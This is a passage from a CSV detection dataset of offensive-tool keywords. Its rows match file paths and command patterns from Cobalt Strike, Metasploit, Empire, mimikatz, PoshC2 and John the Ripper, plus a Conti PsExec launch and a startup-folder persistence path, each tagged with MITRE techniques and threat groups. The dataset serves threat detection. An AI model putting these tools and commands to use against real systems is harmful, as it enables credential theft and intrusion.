TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Stagers\ExeStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Stagers\SvcStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*stagerx64.bin*","offensive_tool_keyword","AlanFramework","Alan Framework 
is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 
- T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StarFighters*","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation 
tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" +"*Starkiller*","offensive_tool_keyword","Starkiller","Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.","T1105 - T1210 - T1059 - T1027 - T1035","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","C2","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","10","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*StarkillerSnackbar.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" 
+"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Start Menu\Programs\Startup\Loader.exe*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*start PsExec.exe -d *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*start stinger ","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 